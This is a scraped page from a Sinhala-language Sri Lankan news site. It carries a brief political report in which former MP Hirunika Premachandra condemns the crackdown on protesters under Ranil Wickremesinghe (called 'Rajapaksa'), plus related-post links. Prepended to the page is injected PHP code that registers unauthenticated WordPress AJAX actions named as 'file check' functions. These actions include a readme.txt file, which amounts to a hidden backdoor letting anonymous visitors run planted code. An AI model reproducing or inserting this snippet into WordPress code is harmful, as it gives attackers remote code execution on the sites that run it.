if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } දන්දිනා වැදු නාලිනී හැදු රනිල් රාජපක්‍ෂගේ අවසානය බිහිසුණුයි..- හිරුණිකා අමුතු ඇගිලි සංඥාවක් පෙන්වමින් - mediahumanrights.lk
mediahumanrights.lk
News Political

දන්දිනා වැදු නාලිනී හැදු රනිල් රාජපක්‍ෂගේ අවසානය බිහිසුණුයි..- හිරුණිකා අමුතු ඇගිලි සංඥාවක් පෙන්වමින්

රනිල් රාජපක්ෂ යනු දන්දිනා වැදූ නාලනී හැදූ දරුවෙක් බව හිටපු පාර්ලිමේන්තු මන්ත්‍රිනී හිරුණිකා ප්‍රේමචන්ද්‍ර මහත්මිය සඳහන් කරයි.

අරගලකරුවන් මේ ආකාරයට මර්දනය කිරීම හරහා රනිල් රාජපක්ෂ ට යන්න වෙන්නෙ හැමෝටම ඉතා භයානක විදිහට බවද ඇය පැවසුවාය.

අරගලකරුවන් ඉලක්ක කරමින් දැවැන්ත මර්ධනයක් ක්‍රියාත්මක කරමින් ඇති බවත් බන්ධනාගාර ගතව සිටින්නේ වරදකරුවන් නොව අහිංසක පුද්ගලයන් බවද ඇය පෙන්වා දෙයි.

අධිරණය ඉදිරියේදී මාධ්‍ය වෙත අදහස් පල කරමින් ඇය මේ බව පැවසුවාය.

Related posts

මන්ත‍්‍රීවරු 93ක් අගමැති රැස්වීම වර්ජනය කරති

Shiran Viraj

සයිටම් ගැන ශ්‍රේෂ්ඨාධිකරණ පෙත්සමක් ගොනු කරනවා

Shiran Viraj

චීනයට යවන්න හෙක්ටයාර 50ක පලතුරු, එළවළු වවන්න..

Shiran Viraj